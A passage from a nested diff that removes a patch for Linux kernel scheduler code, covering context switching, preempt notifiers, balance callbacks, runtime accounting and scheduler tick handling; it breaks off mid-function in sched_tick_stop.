-+	rseq_migrate(p);
-+	/*
-+	 * Fork balancing, do it here and not earlier because:
-+	 * - cpus_ptr can change in the fork path
-+	 * - any previously selected CPU might disappear through hotplug
-+	 *
-+	 * Use __set_task_cpu() to avoid calling sched_class::migrate_task_rq,
-+	 * as we're not fully set-up yet.
-+	 */
-+	__set_task_cpu(p, cpu_of(rq));
-+#endif
-+
-+	raw_spin_lock(&rq->lock);
-+	update_rq_clock(rq);
-+
-+	activate_task(p, rq);
-+	trace_sched_wakeup_new(p);
-+	check_preempt_curr(rq);
-+
-+	raw_spin_unlock(&rq->lock);
-+	raw_spin_unlock_irqrestore(&p->pi_lock, flags);
-+}
-+
-+#ifdef CONFIG_PREEMPT_NOTIFIERS
-+
-+static DEFINE_STATIC_KEY_FALSE(preempt_notifier_key);
-+
-+void preempt_notifier_inc(void)
-+{
-+	static_branch_inc(&preempt_notifier_key);
-+}
-+EXPORT_SYMBOL_GPL(preempt_notifier_inc);
-+
-+void preempt_notifier_dec(void)
-+{
-+	static_branch_dec(&preempt_notifier_key);
-+}
-+EXPORT_SYMBOL_GPL(preempt_notifier_dec);
-+
-+/**
-+ * preempt_notifier_register - tell me when current is being preempted & rescheduled
-+ * @notifier: notifier struct to register
-+ */
-+void preempt_notifier_register(struct preempt_notifier *notifier)
-+{
-+	if (!static_branch_unlikely(&preempt_notifier_key))
-+		WARN(1, "registering preempt_notifier while notifiers disabled\n");
-+
-+	hlist_add_head(&notifier->link, &current->preempt_notifiers);
-+}
-+EXPORT_SYMBOL_GPL(preempt_notifier_register);
-+
-+/**
-+ * preempt_notifier_unregister - no longer interested in preemption notifications
-+ * @notifier: notifier struct to unregister
-+ *
-+ * This is *not* safe to call from within a preemption notifier.
-+ */
-+void preempt_notifier_unregister(struct preempt_notifier *notifier)
-+{
-+	hlist_del(&notifier->link);
-+}
-+EXPORT_SYMBOL_GPL(preempt_notifier_unregister);
-+
-+static void __fire_sched_in_preempt_notifiers(struct task_struct *curr)
-+{
-+	struct preempt_notifier *notifier;
-+
-+	hlist_for_each_entry(notifier, &curr->preempt_notifiers, link)
-+		notifier->ops->sched_in(notifier, raw_smp_processor_id());
-+}
-+
-+static __always_inline void fire_sched_in_preempt_notifiers(struct task_struct *curr)
-+{
-+	if (static_branch_unlikely(&preempt_notifier_key))
-+		__fire_sched_in_preempt_notifiers(curr);
-+}
-+
-+static void
-+__fire_sched_out_preempt_notifiers(struct task_struct *curr,
-+				   struct task_struct *next)
-+{
-+	struct preempt_notifier *notifier;
-+
-+	hlist_for_each_entry(notifier, &curr->preempt_notifiers, link)
-+		notifier->ops->sched_out(notifier, next);
-+}
-+
-+static __always_inline void
-+fire_sched_out_preempt_notifiers(struct task_struct *curr,
-+				 struct task_struct *next)
-+{
-+	if (static_branch_unlikely(&preempt_notifier_key))
-+		__fire_sched_out_preempt_notifiers(curr, next);
-+}
-+
-+#else /* !CONFIG_PREEMPT_NOTIFIERS */
-+
-+static inline void fire_sched_in_preempt_notifiers(struct task_struct *curr)
-+{
-+}
-+
-+static inline void
-+fire_sched_out_preempt_notifiers(struct task_struct *curr,
-+				 struct task_struct *next)
-+{
-+}
-+
-+#endif /* CONFIG_PREEMPT_NOTIFIERS */
-+
-+static inline void prepare_task(struct task_struct *next)
-+{
-+	/*
-+	 * Claim the task as running; we do this before switching to it
-+	 * such that any running task will have this set.
-+	 *
-+	 * See the smp_load_acquire(&p->on_cpu) case in ttwu() and
-+	 * its ordering comment.
-+	 */
-+	WRITE_ONCE(next->on_cpu, 1);
-+}
-+
-+static inline void finish_task(struct task_struct *prev)
-+{
-+#ifdef CONFIG_SMP
-+	/*
-+	 * This must be the very last reference to @prev from this CPU. After
-+	 * p->on_cpu is cleared, the task can be moved to a different CPU. We
-+	 * must ensure this doesn't happen until the switch is completely
-+	 * finished.
-+	 *
-+	 * In particular, the load of prev->state in finish_task_switch() must
-+	 * happen before this.
-+	 *
-+	 * Pairs with the smp_cond_load_acquire() in try_to_wake_up().
-+	 */
-+	smp_store_release(&prev->on_cpu, 0);
-+#else
-+	prev->on_cpu = 0;
-+#endif
-+}
-+
-+#ifdef CONFIG_SMP
-+
-+static void do_balance_callbacks(struct rq *rq, struct balance_callback *head)
-+{
-+	void (*func)(struct rq *rq);
-+	struct balance_callback *next;
-+
-+	lockdep_assert_held(&rq->lock);
-+
-+	while (head) {
-+		func = (void (*)(struct rq *))head->func;
-+		next = head->next;
-+		head->next = NULL;
-+		head = next;
-+
-+		func(rq);
-+	}
-+}
-+
-+static void balance_push(struct rq *rq);
-+
-+/*
-+ * balance_push_callback is a right abuse of the callback interface and plays
-+ * by significantly different rules.
-+ *
-+ * Where the normal balance_callback's purpose is to be run in the same context
-+ * that queued it (only later, when it's safe to drop rq->lock again),
-+ * balance_push_callback is specifically targeted at __schedule().
-+ *
-+ * This abuse is tolerated because it places all the unlikely/odd cases behind
-+ * a single test, namely: rq->balance_callback == NULL.
-+ */
-+struct balance_callback balance_push_callback = {
-+	.next = NULL,
-+	.func = balance_push,
-+};
-+
-+static inline struct balance_callback *
-+__splice_balance_callbacks(struct rq *rq, bool split)
-+{
-+	struct balance_callback *head = rq->balance_callback;
-+
-+	if (likely(!head))
-+		return NULL;
-+
-+	lockdep_assert_rq_held(rq);
-+	/*
-+	 * Must not take balance_push_callback off the list when
-+	 * splice_balance_callbacks() and balance_callbacks() are not
-+	 * in the same rq->lock section.
-+	 *
-+	 * In that case it would be possible for __schedule() to interleave
-+	 * and observe the list empty.
-+	 */
-+	if (split && head == &balance_push_callback)
-+		head = NULL;
-+	else
-+		rq->balance_callback = NULL;
-+
-+	return head;
-+}
-+
-+static inline struct balance_callback *splice_balance_callbacks(struct rq *rq)
-+{
-+	return __splice_balance_callbacks(rq, true);
-+}
-+
-+static void __balance_callbacks(struct rq *rq)
-+{
-+	do_balance_callbacks(rq, __splice_balance_callbacks(rq, false));
-+}
-+
-+static inline void balance_callbacks(struct rq *rq, struct balance_callback *head)
-+{
-+	unsigned long flags;
-+
-+	if (unlikely(head)) {
-+		raw_spin_lock_irqsave(&rq->lock, flags);
-+		do_balance_callbacks(rq, head);
-+		raw_spin_unlock_irqrestore(&rq->lock, flags);
-+	}
-+}
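-+
-+/*
-+ * A minimal usage sketch (illustrative): callers that must drop rq->lock
-+ * before running the callbacks pair the two helpers above:
-+ *
-+ *	head = splice_balance_callbacks(rq);	// under rq->lock
-+ *	raw_spin_unlock(&rq->lock);
-+ *	...
-+ *	balance_callbacks(rq, head);		// re-takes rq->lock if needed
-+ *
-+ * whereas __balance_callbacks() handles the same-lock-section case.
-+ */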
-+
-+#else
-+
-+static inline void __balance_callbacks(struct rq *rq)
-+{
-+}
-+
-+static inline struct balance_callback *splice_balance_callbacks(struct rq *rq)
-+{
-+	return NULL;
-+}
-+
-+static inline void balance_callbacks(struct rq *rq, struct balance_callback *head)
-+{
-+}
-+
-+#endif
-+
-+static inline void
-+prepare_lock_switch(struct rq *rq, struct task_struct *next)
-+{
-+	/*
-+	 * The runqueue lock will be released by the next
-+	 * task (which is an invalid locking op but in the case
-+	 * of the scheduler it's an obvious special case), so we
-+	 * do an early lockdep release here:
-+	 */
-+	spin_release(&rq->lock.dep_map, _THIS_IP_);
-+#ifdef CONFIG_DEBUG_SPINLOCK
-+	/* this is a valid case when another task releases the spinlock */
-+	rq->lock.owner = next;
-+#endif
-+}
-+
-+static inline void finish_lock_switch(struct rq *rq)
-+{
-+	/*
-+	 * If we are tracking spinlock dependencies then we have to
-+	 * fix up the runqueue lock - which gets 'carried over' from
-+	 * prev into current:
-+	 */
-+	spin_acquire(&rq->lock.dep_map, 0, 0, _THIS_IP_);
-+	__balance_callbacks(rq);
-+	raw_spin_unlock_irq(&rq->lock);
-+}
-+
-+/*
-+ * NOP if the arch has not defined these:
-+ */
-+
-+#ifndef prepare_arch_switch
-+# define prepare_arch_switch(next)	do { } while (0)
-+#endif
-+
-+#ifndef finish_arch_post_lock_switch
-+# define finish_arch_post_lock_switch()	do { } while (0)
-+#endif
-+
-+static inline void kmap_local_sched_out(void)
-+{
-+#ifdef CONFIG_KMAP_LOCAL
-+	if (unlikely(current->kmap_ctrl.idx))
-+		__kmap_local_sched_out();
-+#endif
-+}
-+
-+static inline void kmap_local_sched_in(void)
-+{
-+#ifdef CONFIG_KMAP_LOCAL
-+	if (unlikely(current->kmap_ctrl.idx))
-+		__kmap_local_sched_in();
-+#endif
-+}
-+
-+/**
-+ * prepare_task_switch - prepare to switch tasks
-+ * @rq: the runqueue preparing to switch
-+ * @next: the task we are going to switch to.
-+ *
-+ * This is called with the rq lock held and interrupts off. It must
-+ * be paired with a subsequent finish_task_switch after the context
-+ * switch.
-+ *
-+ * prepare_task_switch sets up locking and calls architecture specific
-+ * hooks.
-+ */
-+static inline void
-+prepare_task_switch(struct rq *rq, struct task_struct *prev,
-+		    struct task_struct *next)
-+{
-+	kcov_prepare_switch(prev);
-+	sched_info_switch(rq, prev, next);
-+	perf_event_task_sched_out(prev, next);
-+	rseq_preempt(prev);
-+	fire_sched_out_preempt_notifiers(prev, next);
-+	kmap_local_sched_out();
-+	prepare_task(next);
-+	prepare_arch_switch(next);
-+}
-+
-+/**
-+ * finish_task_switch - clean up after a task-switch
-+ * @rq: runqueue associated with task-switch
-+ * @prev: the thread we just switched away from.
-+ *
-+ * finish_task_switch must be called after the context switch, paired
-+ * with a prepare_task_switch call before the context switch.
-+ * finish_task_switch will reconcile locking set up by prepare_task_switch,
-+ * and do any other architecture-specific cleanup actions.
-+ *
-+ * Note that we may have delayed dropping an mm in context_switch(). If
-+ * so, we finish that here outside of the runqueue lock.  (Doing it
-+ * with the lock held can cause deadlocks; see schedule() for
-+ * details.)
-+ *
-+ * The context switch has flipped the stack from under us and restored the
-+ * local variables which were saved when this task called schedule() in the
-+ * past. prev == current is still correct but we need to recalculate this_rq
-+ * because prev may have moved to another CPU.
-+ */
-+static struct rq *finish_task_switch(struct task_struct *prev)
-+	__releases(rq->lock)
-+{
-+	struct rq *rq = this_rq();
-+	struct mm_struct *mm = rq->prev_mm;
-+	unsigned int prev_state;
-+
-+	/*
-+	 * The previous task will have left us with a preempt_count of 2
-+	 * because it left us after:
-+	 *
-+	 *	schedule()
-+	 *	  preempt_disable();			// 1
-+	 *	  __schedule()
-+	 *	    raw_spin_lock_irq(&rq->lock)	// 2
-+	 *
-+	 * Also, see FORK_PREEMPT_COUNT.
-+	 */
-+	if (WARN_ONCE(preempt_count() != 2*PREEMPT_DISABLE_OFFSET,
-+		      "corrupted preempt_count: %s/%d/0x%x\n",
-+		      current->comm, current->pid, preempt_count()))
-+		preempt_count_set(FORK_PREEMPT_COUNT);
-+
-+	rq->prev_mm = NULL;
-+
-+	/*
-+	 * A task struct has one reference for the use as "current".
-+	 * If a task dies, then it sets TASK_DEAD in tsk->state and calls
-+	 * schedule one last time. The schedule call will never return, and
-+	 * the scheduled task must drop that reference.
-+	 *
-+	 * We must observe prev->state before clearing prev->on_cpu (in
-+	 * finish_task), otherwise a concurrent wakeup can get prev
-+	 * running on another CPU and we could race with its RUNNING -> DEAD
-+	 * transition, resulting in a double drop.
-+	 */
-+	prev_state = READ_ONCE(prev->__state);
-+	vtime_task_switch(prev);
-+	perf_event_task_sched_in(prev, current);
-+	finish_task(prev);
-+	tick_nohz_task_switch();
-+	finish_lock_switch(rq);
-+	finish_arch_post_lock_switch();
-+	kcov_finish_switch(current);
-+	/*
-+	 * kmap_local_sched_out() is invoked with rq::lock held and
-+	 * interrupts disabled. There is no requirement for that, but the
-+	 * sched out code does not have an interrupt enabled section.
-+	 * Restoring the maps on sched in does not require interrupts being
-+	 * disabled either.
-+	 */
-+	kmap_local_sched_in();
-+
-+	fire_sched_in_preempt_notifiers(current);
-+	/*
-+	 * When switching through a kernel thread, the loop in
-+	 * membarrier_{private,global}_expedited() may have observed that
-+	 * kernel thread and not issued an IPI. It is therefore possible to
-+	 * schedule between user->kernel->user threads without passing through
-+	 * switch_mm(). Membarrier requires a barrier after storing to
-+	 * rq->curr, before returning to userspace, so provide them here:
-+	 *
-+	 * - a full memory barrier for {PRIVATE,GLOBAL}_EXPEDITED, implicitly
-+	 *   provided by mmdrop(),
-+	 * - a sync_core for SYNC_CORE.
-+	 */
-+	if (mm) {
-+		membarrier_mm_sync_core_before_usermode(mm);
-+		mmdrop_sched(mm);
-+	}
-+	if (unlikely(prev_state == TASK_DEAD)) {
-+		/* Task is done with its stack. */
-+		put_task_stack(prev);
-+
-+		put_task_struct_rcu_user(prev);
-+	}
-+
-+	return rq;
-+}
-+
-+/**
-+ * schedule_tail - first thing a freshly forked thread must call.
-+ * @prev: the thread we just switched away from.
-+ */
-+asmlinkage __visible void schedule_tail(struct task_struct *prev)
-+	__releases(rq->lock)
-+{
-+	/*
-+	 * New tasks start with FORK_PREEMPT_COUNT, see there and
-+	 * finish_task_switch() for details.
-+	 *
-+	 * finish_task_switch() will drop rq->lock() and lower preempt_count
-+	 * and the preempt_enable() will end up enabling preemption (on
-+	 * PREEMPT_COUNT kernels).
-+	 */
-+
-+	finish_task_switch(prev);
-+	preempt_enable();
-+
-+	if (current->set_child_tid)
-+		put_user(task_pid_vnr(current), current->set_child_tid);
-+
-+	calculate_sigpending();
-+}
-+
-+/*
-+ * context_switch - switch to the new MM and the new thread's register state.
-+ */
-+static __always_inline struct rq *
-+context_switch(struct rq *rq, struct task_struct *prev,
-+	       struct task_struct *next)
-+{
-+	prepare_task_switch(rq, prev, next);
-+
-+	/*
-+	 * For paravirt, this is coupled with an exit in switch_to to
-+	 * combine the page table reload and the switch backend into
-+	 * one hypercall.
-+	 */
-+	arch_start_context_switch(prev);
-+
-+	/*
-+	 * kernel -> kernel   lazy + transfer active
-+	 *   user -> kernel   lazy + mmgrab() active
-+	 *
-+	 * kernel ->   user   switch + mmdrop() active
-+	 *   user ->   user   switch
-+	 */
-+	if (!next->mm) {                                // to kernel
-+		enter_lazy_tlb(prev->active_mm, next);
-+
-+		next->active_mm = prev->active_mm;
-+		if (prev->mm)                           // from user
-+			mmgrab(prev->active_mm);
-+		else
-+			prev->active_mm = NULL;
-+	} else {                                        // to user
-+		membarrier_switch_mm(rq, prev->active_mm, next->mm);
-+		/*
-+		 * sys_membarrier() requires an smp_mb() between setting
-+		 * rq->curr / membarrier_switch_mm() and returning to userspace.
-+		 *
-+		 * The below provides this either through switch_mm(), or in
-+		 * case 'prev->active_mm == next->mm' through
-+		 * finish_task_switch()'s mmdrop().
-+		 */
-+		switch_mm_irqs_off(prev->active_mm, next->mm, next);
-+		lru_gen_use_mm(next->mm);
-+
-+		if (!prev->mm) {                        // from kernel
-+			/* will mmdrop() in finish_task_switch(). */
-+			rq->prev_mm = prev->active_mm;
-+			prev->active_mm = NULL;
-+		}
-+	}
-+
-+	prepare_lock_switch(rq, next);
-+
-+	/* Here we just switch the register state and the stack. */
-+	switch_to(prev, next, prev);
-+	barrier();
-+
-+	return finish_task_switch(prev);
-+}
-+
-+/*
-+ * nr_running, nr_uninterruptible and nr_context_switches:
-+ *
-+ * externally visible scheduler statistics: current number of runnable
-+ * threads, total number of context switches performed since bootup.
-+ */
-+unsigned int nr_running(void)
-+{
-+	unsigned int i, sum = 0;
-+
-+	for_each_online_cpu(i)
-+		sum += cpu_rq(i)->nr_running;
-+
-+	return sum;
-+}
-+
-+/*
-+ * Check if only the current task is running on the CPU.
-+ *
-+ * Caution: this function does not check that the caller has disabled
-+ * preemption, thus the result might have a time-of-check-to-time-of-use
-+ * race.  The caller is responsible for using it correctly, for example:
-+ *
-+ * - from a non-preemptible section (of course)
-+ *
-+ * - from a thread that is bound to a single CPU
-+ *
-+ * - in a loop with very short iterations (e.g. a polling loop)
-+ */
-+bool single_task_running(void)
-+{
-+	return raw_rq()->nr_running == 1;
-+}
-+EXPORT_SYMBOL(single_task_running);
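-+
-+/*
-+ * A minimal polling-loop sketch (illustrative, assuming a caller that may
-+ * busy-wait briefly):
-+ *
-+ *	while (single_task_running() && !need_resched())
-+ *		cpu_relax();
-+ *
-+ * The time-of-check-to-time-of-use race described above is tolerable here
-+ * because the condition is re-evaluated on every short iteration.
-+ */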
-+
-+unsigned long long nr_context_switches(void)
-+{
-+	int i;
-+	unsigned long long sum = 0;
-+
-+	for_each_possible_cpu(i)
-+		sum += cpu_rq(i)->nr_switches;
-+
-+	return sum;
-+}
-+
-+/*
-+ * Consumers of these two interfaces, like for example the cpuidle menu
-+ * governor, are using nonsensical data: they prefer shallow idle state
-+ * selection for a CPU that has IO-wait pending, even though that CPU might
-+ * not end up running the task when it does become runnable.
-+ */
-+
-+unsigned int nr_iowait_cpu(int cpu)
-+{
-+	return atomic_read(&cpu_rq(cpu)->nr_iowait);
-+}
-+
-+/*
-+ * IO-wait accounting, and how it's mostly bollocks (on SMP).
-+ *
-+ * The idea behind IO-wait accounting is to account the idle time that we
-+ * could have spent running if it were not for IO. That is, if we were to
-+ * improve the
-+ * storage performance, we'd have a proportional reduction in IO-wait time.
-+ *
-+ * This all works nicely on UP, where, when a task blocks on IO, we account
-+ * idle time as IO-wait, because if the storage were faster, it could've been
-+ * running and we'd not be idle.
-+ *
-+ * This has been extended to SMP, by doing the same for each CPU. This however
-+ * is broken.
-+ *
-+ * Imagine for instance the case where two tasks block on one CPU, only the one
-+ * CPU will have IO-wait accounted, while the other has regular idle. Even
-+ * though, if the storage were faster, both could've run at the same time,
-+ * utilising both CPUs.
-+ *
-+ * This means that, when looking globally, the current IO-wait accounting on
-+ * SMP is a lower bound, due to under-accounting.
-+ *
-+ * Worse, since the numbers are provided per CPU, they are sometimes
-+ * interpreted per CPU, and that is nonsensical. A blocked task isn't strictly
-+ * associated with any one particular CPU; it can wake up on a different CPU
-+ * than the one it blocked on. This means the per-CPU IO-wait number is
-+ * meaningless.
-+ *
-+ * Task CPU affinities can make all that even more 'interesting'.
-+ */
-+
-+unsigned int nr_iowait(void)
-+{
-+	unsigned int i, sum = 0;
-+
-+	for_each_possible_cpu(i)
-+		sum += nr_iowait_cpu(i);
-+
-+	return sum;
-+}
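-+
-+/*
-+ * Worked example (illustrative): two tasks block on IO while affine to
-+ * CPU0. Only CPU0 accrues IO-wait; CPU1 accrues plain idle, even though
-+ * faster storage would have let both tasks run, one per CPU. Summed
-+ * globally this under-accounts; read per CPU it is meaningless, since
-+ * either task may wake up on CPU1 instead.
-+ */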
-+
-+#ifdef CONFIG_SMP
-+
-+/*
-+ * sched_exec - execve() is a valuable balancing opportunity, because at
-+ * this point the task has the smallest effective memory and cache
-+ * footprint.
-+ */
-+void sched_exec(void)
-+{
-+}
-+
-+#endif
-+
-+DEFINE_PER_CPU(struct kernel_stat, kstat);
-+DEFINE_PER_CPU(struct kernel_cpustat, kernel_cpustat);
-+
-+EXPORT_PER_CPU_SYMBOL(kstat);
-+EXPORT_PER_CPU_SYMBOL(kernel_cpustat);
-+
-+static inline void update_curr(struct rq *rq, struct task_struct *p)
-+{
-+	s64 ns = rq->clock_task - p->last_ran;
-+
-+	p->sched_time += ns;
-+	cgroup_account_cputime(p, ns);
-+	account_group_exec_runtime(p, ns);
-+
-+	p->time_slice -= ns;
-+	p->last_ran = rq->clock_task;
-+}
-+
-+/*
-+ * Return accounted runtime for the task.
-+ * Also return the current task's pending runtime that has not been
-+ * accounted yet.
-+ */
-+unsigned long long task_sched_runtime(struct task_struct *p)
-+{
-+	unsigned long flags;
-+	struct rq *rq;
-+	raw_spinlock_t *lock;
-+	u64 ns;
-+
-+#if defined(CONFIG_64BIT) && defined(CONFIG_SMP)
-+	/*
-+	 * 64-bit doesn't need locks to atomically read a 64-bit value.
-+	 * So we have an optimization chance when the task's delta_exec is 0.
-+	 * Reading ->on_cpu is racy, but this is ok.
-+	 *
-+	 * If we race with it leaving CPU, we'll take a lock. So we're correct.
-+	 * If we race with it entering CPU, unaccounted time is 0. This is
-+	 * indistinguishable from the read occurring a few cycles earlier.
-+	 * If we see ->on_cpu without ->on_rq, the task is leaving, and has
-+	 * been accounted, so we're correct here as well.
-+	 */
-+	if (!p->on_cpu || !task_on_rq_queued(p))
-+		return tsk_seruntime(p);
-+#endif
-+
-+	rq = task_access_lock_irqsave(p, &lock, &flags);
-+	/*
-+	 * Must be ->curr _and_ ->on_rq.  If dequeued, we would
-+	 * project cycles that may never be accounted to this
-+	 * thread, breaking clock_gettime().
-+	 */
-+	if (p == rq->curr && task_on_rq_queued(p)) {
-+		update_rq_clock(rq);
-+		update_curr(rq, p);
-+	}
-+	ns = tsk_seruntime(p);
-+	task_access_unlock_irqrestore(p, lock, &flags);
-+
-+	return ns;
-+}
-+
-+/* This manages tasks that have run out of timeslice during a scheduler_tick */
-+static inline void scheduler_task_tick(struct rq *rq)
-+{
-+	struct task_struct *p = rq->curr;
-+
-+	if (is_idle_task(p))
-+		return;
-+
-+	update_curr(rq, p);
-+	cpufreq_update_util(rq, 0);
-+
-+	/*
-+	 * Tasks that have less than RESCHED_NS of time slice left will be
-+	 * rescheduled.
-+	 */
-+	if (p->time_slice >= RESCHED_NS)
-+		return;
-+	set_tsk_need_resched(p);
-+	set_preempt_need_resched();
-+}
-+
-+#ifdef CONFIG_SCHED_DEBUG
-+static u64 cpu_resched_latency(struct rq *rq)
-+{
-+	int latency_warn_ms = READ_ONCE(sysctl_resched_latency_warn_ms);
-+	u64 resched_latency, now = rq_clock(rq);
-+	static bool warned_once;
-+
-+	if (sysctl_resched_latency_warn_once && warned_once)
-+		return 0;
-+
-+	if (!need_resched() || !latency_warn_ms)
-+		return 0;
-+
-+	if (system_state == SYSTEM_BOOTING)
-+		return 0;
-+
-+	if (!rq->last_seen_need_resched_ns) {
-+		rq->last_seen_need_resched_ns = now;
-+		rq->ticks_without_resched = 0;
-+		return 0;
-+	}
-+
-+	rq->ticks_without_resched++;
-+	resched_latency = now - rq->last_seen_need_resched_ns;
-+	if (resched_latency <= latency_warn_ms * NSEC_PER_MSEC)
-+		return 0;
-+
-+	warned_once = true;
-+
-+	return resched_latency;
-+}
-+
-+static int __init setup_resched_latency_warn_ms(char *str)
-+{
-+	long val;
-+
-+	if ((kstrtol(str, 0, &val))) {
-+		pr_warn("Unable to set resched_latency_warn_ms\n");
-+		return 1;
-+	}
-+
-+	sysctl_resched_latency_warn_ms = val;
-+	return 1;
-+}
-+__setup("resched_latency_warn_ms=", setup_resched_latency_warn_ms);
-+#else
-+static inline u64 cpu_resched_latency(struct rq *rq) { return 0; }
-+#endif /* CONFIG_SCHED_DEBUG */
-+
-+/*
-+ * This function gets called by the timer code, with HZ frequency.
-+ * We call it with interrupts disabled.
-+ */
-+void scheduler_tick(void)
-+{
-+	int cpu __maybe_unused = smp_processor_id();
-+	struct rq *rq = cpu_rq(cpu);
-+	u64 resched_latency;
-+
-+	arch_scale_freq_tick();
-+	sched_clock_tick();
-+
-+	raw_spin_lock(&rq->lock);
-+	update_rq_clock(rq);
-+
-+	scheduler_task_tick(rq);
-+	if (sched_feat(LATENCY_WARN))
-+		resched_latency = cpu_resched_latency(rq);
-+	calc_global_load_tick(rq);
-+
-+	rq->last_tick = rq->clock;
-+	raw_spin_unlock(&rq->lock);
-+
-+	if (sched_feat(LATENCY_WARN) && resched_latency)
-+		resched_latency_warn(cpu, resched_latency);
-+
-+	perf_event_task_tick();
-+}
-+
-+#ifdef CONFIG_SCHED_SMT
-+static inline int sg_balance_cpu_stop(void *data)
-+{
-+	struct rq *rq = this_rq();
-+	struct task_struct *p = data;
-+	cpumask_t tmp;
-+	unsigned long flags;
-+
-+	local_irq_save(flags);
-+
-+	raw_spin_lock(&p->pi_lock);
-+	raw_spin_lock(&rq->lock);
-+
-+	rq->active_balance = 0;
-+	/* _something_ may have changed the task, double check again */
-+	if (task_on_rq_queued(p) && task_rq(p) == rq &&
-+	    cpumask_and(&tmp, p->cpus_ptr, &sched_sg_idle_mask) &&
-+	    !is_migration_disabled(p)) {
-+		int cpu = cpu_of(rq);
-+		int dcpu = __best_mask_cpu(&tmp, per_cpu(sched_cpu_llc_mask, cpu));
-+		rq = move_queued_task(rq, p, dcpu);
-+	}
-+
-+	raw_spin_unlock(&rq->lock);
-+	raw_spin_unlock(&p->pi_lock);
-+
-+	local_irq_restore(flags);
-+
-+	return 0;
-+}
-+
-+/* sg_balance_trigger - trigger sibling group balance for @cpu */
-+static inline int sg_balance_trigger(const int cpu)
-+{
-+	struct rq *rq = cpu_rq(cpu);
-+	unsigned long flags;
-+	struct task_struct *curr;
-+	int res;
-+
-+	if (!raw_spin_trylock_irqsave(&rq->lock, flags))
-+		return 0;
-+	curr = rq->curr;
-+	res = (!is_idle_task(curr)) && (1 == rq->nr_running) &&
-+	      cpumask_intersects(curr->cpus_ptr, &sched_sg_idle_mask) &&
-+	      !is_migration_disabled(curr) && (!rq->active_balance);
-+
-+	if (res)
-+		rq->active_balance = 1;
-+
-+	raw_spin_unlock_irqrestore(&rq->lock, flags);
-+
-+	if (res)
-+		stop_one_cpu_nowait(cpu, sg_balance_cpu_stop, curr,
-+				    &rq->active_balance_work);
-+	return res;
-+}
-+
-+/*
-+ * sg_balance - sibling group balance check for run queue @rq
-+ */
-+static inline void sg_balance(struct rq *rq)
-+{
-+	cpumask_t chk;
-+	int cpu = cpu_of(rq);
-+
-+	/* exit when cpu is offline */
-+	if (unlikely(!rq->online))
-+		return;
-+
-+	/*
-+	 * Only a cpu in the sibling idle group will do the checking, and then
-+	 * find potential cpus which can migrate the current running task
-+	 */
-+	if (cpumask_test_cpu(cpu, &sched_sg_idle_mask) &&
-+	    cpumask_andnot(&chk, cpu_online_mask, sched_idle_mask) &&
-+	    cpumask_andnot(&chk, &chk, &sched_rq_pending_mask)) {
-+		int i;
-+
-+		for_each_cpu_wrap(i, &chk, cpu) {
-+			if (cpumask_subset(cpu_smt_mask(i), &chk) &&
-+			    sg_balance_trigger(i))
-+				return;
-+		}
-+	}
-+}
-+#endif /* CONFIG_SCHED_SMT */
-+
-+#ifdef CONFIG_NO_HZ_FULL
-+
-+struct tick_work {
-+	int			cpu;
-+	atomic_t		state;
-+	struct delayed_work	work;
-+};
-+/* Values for ->state, see diagram below. */
-+#define TICK_SCHED_REMOTE_OFFLINE	0
-+#define TICK_SCHED_REMOTE_OFFLINING	1
-+#define TICK_SCHED_REMOTE_RUNNING	2
-+
-+/*
-+ * State diagram for ->state:
-+ *
-+ *
-+ *          TICK_SCHED_REMOTE_OFFLINE
-+ *                    |   ^
-+ *                    |   |
-+ *                    |   | sched_tick_remote()
-+ *                    |   |
-+ *                    |   |
-+ *                    +--TICK_SCHED_REMOTE_OFFLINING
-+ *                    |   ^
-+ *                    |   |
-+ * sched_tick_start() |   | sched_tick_stop()
-+ *                    |   |
-+ *                    V   |
-+ *          TICK_SCHED_REMOTE_RUNNING
-+ *
-+ *
-+ * Other transitions get WARN_ON_ONCE(), except that sched_tick_remote()
-+ * and sched_tick_start() are happy to leave the state in RUNNING.
-+ */
-+
-+static struct tick_work __percpu *tick_work_cpu;
-+
-+static void sched_tick_remote(struct work_struct *work)
-+{
-+	struct delayed_work *dwork = to_delayed_work(work);
-+	struct tick_work *twork = container_of(dwork, struct tick_work, work);
-+	int cpu = twork->cpu;
-+	struct rq *rq = cpu_rq(cpu);
-+	struct task_struct *curr;
-+	unsigned long flags;
-+	u64 delta;
-+	int os;
-+
-+	/*
-+	 * Handle the tick only if it appears the remote CPU is running in full
-+	 * dynticks mode. The check is racy by nature, but missing a tick or
-+	 * having one too many is no big deal because the scheduler tick updates
-+	 * statistics and checks timeslices in a time-independent way, regardless
-+	 * of when exactly it is running.
-+	 */
-+	if (!tick_nohz_tick_stopped_cpu(cpu))
-+		goto out_requeue;
-+
-+	raw_spin_lock_irqsave(&rq->lock, flags);
-+	curr = rq->curr;
-+	if (cpu_is_offline(cpu))
-+		goto out_unlock;
-+
-+	update_rq_clock(rq);
-+	if (!is_idle_task(curr)) {
-+		/*
-+		 * Make sure the next tick runs within a reasonable
-+		 * amount of time.
-+		 */
-+		delta = rq_clock_task(rq) - curr->last_ran;
-+		WARN_ON_ONCE(delta > (u64)NSEC_PER_SEC * 3);
-+	}
-+	scheduler_task_tick(rq);
-+
-+	calc_load_nohz_remote(rq);
-+out_unlock:
-+	raw_spin_unlock_irqrestore(&rq->lock, flags);
-+
-+out_requeue:
-+	/*
-+	 * Run the remote tick once per second (1Hz). This arbitrary
-+	 * period is long enough to avoid overload but short enough
-+	 * to keep scheduler internal stats reasonably up to date.  But
-+	 * first update state to reflect hotplug activity if required.
-+	 */
-+	os = atomic_fetch_add_unless(&twork->state, -1, TICK_SCHED_REMOTE_RUNNING);
-+	WARN_ON_ONCE(os == TICK_SCHED_REMOTE_OFFLINE);
-+	if (os == TICK_SCHED_REMOTE_RUNNING)
-+		queue_delayed_work(system_unbound_wq, dwork, HZ);
-+}
-+
-+static void sched_tick_start(int cpu)
-+{
-+	int os;
-+	struct tick_work *twork;
-+
-+	if (housekeeping_cpu(cpu, HK_TYPE_TICK))
-+		return;
-+
-+	WARN_ON_ONCE(!tick_work_cpu);
-+
-+	twork = per_cpu_ptr(tick_work_cpu, cpu);
-+	os = atomic_xchg(&twork->state, TICK_SCHED_REMOTE_RUNNING);
-+	WARN_ON_ONCE(os == TICK_SCHED_REMOTE_RUNNING);
-+	if (os == TICK_SCHED_REMOTE_OFFLINE) {
-+		twork->cpu = cpu;
-+		INIT_DELAYED_WORK(&twork->work, sched_tick_remote);
-+		queue_delayed_work(system_unbound_wq, &twork->work, HZ);
-+	}
-+}
-+
-+#ifdef CONFIG_HOTPLUG_CPU
-+static void sched_tick_stop(int cpu)
-+{
-+	struct tick_work *twork;
-+
-+	if (housekeeping_cpu(cpu, HK_TYPE_TICK))
-+		return;
-+
-+	WARN_ON_ONCE(!tick_work_cpu);
-+
